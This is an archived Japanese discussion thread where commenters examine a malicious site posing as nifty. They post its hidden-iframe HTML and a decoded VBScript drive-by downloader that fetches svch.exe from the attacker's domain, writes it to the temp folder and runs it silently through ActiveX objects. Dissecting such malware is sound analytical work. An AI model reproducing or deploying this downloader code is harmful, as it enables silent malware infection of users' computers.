パスワードを忘れた? アカウント作成
この議論は賞味期限が切れたので、アーカイブ化されています。 新たにコメントを付けることはできません。

niftyに偽装した悪意のあるサイトが登場」記事へのコメント

  • w3mで見たら、 (スコア:5, おもしろおかしい)

    by Anonymous Coward
    <html>
    <head>
    <meta http-equiv="Content-Language" content="zh-cn">
    <meta http-equiv="Content-Type" content="text/html; charset=gb2312">
    <title></title>
    </head>
    <body bgcolor="#9CCCFF" topmargin="80" leftmargin="0">
    <p align="center"><img border="0" src="img.gif" width="0" height="0"></p>
    <iframe src="httP://www.homepage3-nifty.com/online/admin.htm" name="zhu" width="0" height="0" frameborder="0"></body>
    </html>

    しか見えませんでした。
    • Re:w3mで見たら、 (スコア:0, 余計なもの)

      by Anonymous Coward
      さらに,iframeの中をLynxで見てみました。ソースは以下。
      <SCRIPT>var Words="%3Chtml%3E%0D%0A %3Cscript language%3D%22VBScript%22%3E%0D%0
      +A on error resume next%0D%0A dl %3D %22http%3A%2F%2Fwww%2Ehomepage3%2Dni
      +fty%2Ecom%2Fonline%2Fsvch%2Eexe%22%0D%0A Set df %3D document%2EcreateElemen
      +t%28%22object%22%29%0D%0A df%2EsetAttribute %22classid%22%2C %22clsid%3ABD9
      +6C556%2D65A3%2D11D0%2D983A%2D00C04FC29E36%22%0D%0A str%3D%22Microsoft%2EXML
      +HTTP%22%0D%0A Set x %3D df%2ECreateObject%28str%2C%22
      • Re:w3mで見たら、 (スコア:0, 余計なもの)

        by Anonymous Coward on 2007年01月04日 0時49分 (#1086095)
        はい、ついでにadmin.htm をデコードしてみました。
        一部伏字にしときます。
        svch.exe は別コメントがあるので省略。

        <SCRIPT>var Words="<html>
        <script language="VBScript">
            on error resume next
            dl = "http://www.homepage3-nifty.com/online/svch.exe"
            Set df = document.createElement("object")
            df.setAttribute "classid", "clsid: XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX"
            str="Microsoft.XMLHTTP"
            Set x = df.CreateObject(str,"")
            a1="Ado"
            a2="db."
            a3="Str"
            a4="eam"
            str1=a1&a2&a3&a4
            str5=str1
            set S = df.createobject(str5,"")
            S.type = 1
            str6="GET"
            x.Open str6, dl, False
            x.Send
            fname1="g0ld.com"
            set F = df.createobject("Scripting.FileSystemObject","")
            set tmp = F.GetSpecialFolder(2)
            fname1= F.BuildPath(tmp,fname1)
            S.open
            S.write x.responseBody
            S.savetofile fname1,2
            S.close
            set Q = df.createobject("Shell.Application","")
            Q.ShellExecute fname1,"","","open",0
            </script>
            <head>
            </body></html>

        ";document.write(unescape(Words))</SCRIPT>

        親コメント

アレゲは一日にしてならず -- アレゲ見習い

処理中...